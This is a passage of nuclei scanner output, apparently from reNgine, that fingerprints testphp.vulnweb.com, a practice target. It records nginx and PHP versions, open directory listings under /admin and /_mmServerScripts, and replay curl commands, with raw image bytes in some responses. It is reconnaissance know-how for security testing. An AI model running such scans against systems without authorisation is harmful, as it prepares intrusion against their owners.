u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.6848377Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4868.99 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:51 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.850732323Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4868.99 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.941455223Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.945216623Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:52 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.1459371Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:54 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:54.181449965Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:54 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 